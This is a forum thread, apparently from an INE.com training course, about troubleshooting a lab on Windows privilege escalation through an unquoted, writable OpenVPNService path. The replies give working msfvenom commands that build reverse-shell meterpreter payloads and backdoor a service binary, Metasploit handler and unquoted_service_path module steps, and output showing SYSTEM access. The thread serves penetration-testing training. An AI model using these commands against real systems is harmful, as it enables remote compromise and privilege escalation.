Lab 16 - Privilege Escalation via Services - issue on reverse shell back connection

Hi all,

I performed this lab until the end and I checked my solution with the proposed one but, when I reboot the victim machine, I do not get any reverse shell.
I tried also to manually execute the meterpreter payload called openvpnserv.exe that I inserted at C:\Program Files\OpenVPN\bin and I actually got a reverse meterpreter shell but when I try to reboot the victim machine to get that executable run by the Service OpenVPNService at startup time, the reverse shell does not appear. I checked and, after the reboot, the OpenVPNService is in a “Stopped” state, even though it should automatically start, as stated by the solution and by the evidences I collected since it is in start=auto mode. I also tried the #3 alternative of the solution by adding the payload to the original openvpnserv.exe file but it didn’t work.

Could someone experienced the same issue? Can someone help me in finding the reasons of the failure?

Thank you very much.

If it is set to start automatically, does it work when you revert you changes to it and what does the eventlog tell about that service?
For me that did not work

cd "C:\Program Files\OpenVPN\bin"
download openvpnserv.exe
cp openvpnserv.exe openvpnserv.exe.bak # target
cp openvpnserv.exe openvpnserv.exe.bak # attacker machine
msfvenom -p windows/meterpreter/reverse_tcp  LHOST=172.50.50.100 LPORT=6666  -o openvpnserv.exe -x openvpnserv.exe.bak -k -f exe
upload openvpnserv.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 6666
set lhost tap0
run -j

sessions -1 -C reboot -f 2

That worked though:

use exploit/windows/local/unquoted_service_path
set session 1
set lhost tap0
run
[*] Started reverse TCP handler on 172.50.50.100:4444
[*] Finding a vulnerable service...
[*] Attempting exploitation of OpenVPNService
[*] Placing C:\Program.exe for OpenVPNService
[*] Attempting to write 15872 bytes to C:\Program.exe...
[+] Manual cleanup of C:\Program.exe is required due to a potential reboot for exploitation.
[+] Successfully wrote payload
[*] Launching service OpenVPNService...
[*] Manual cleanup of the payload file is required. OpenVPNService will fail to start as long as the payload remains on disk.
[-] Unable to restart service.  System reboot or an admin restarting the service is required.  Payload left on disk!!!
[*] Exploit completed, but no session was created.

sessions -1 -C reboot -f 2


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4444
set lhost tap0
run -j
getuid
Server username: NT AUTHORITY\SYSTEM
1 Like

Hi,

thank you for the precious time you dedicated to answer me. Anyway, just to mention, I did not generate my meterpreter payload with the payload you provided by I used the classic: msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.50.50.100 LPORT=6000 -f exe -a x86 --platform Windows --o openvpnserv.exe. Then I positioned such file at C:\Program Files\OpenVPN\bin. In matter of facts, it should work both when put inside the aforementioned directory and the C:\ directory (after changing the filename to Program.exe), due to the presence of Unquoted Service Path misconfiguration.
Anyway, tonight I tried again to exercise on this lab and the same procedure I followed yesterday worked! Therefore, I conclude that the ones of yesterday were issues related to INE.com (yesterday I also tried to reset the lab many times but it did not solve the problem).

Thank you anyway.
Cheers,
Ema

1 Like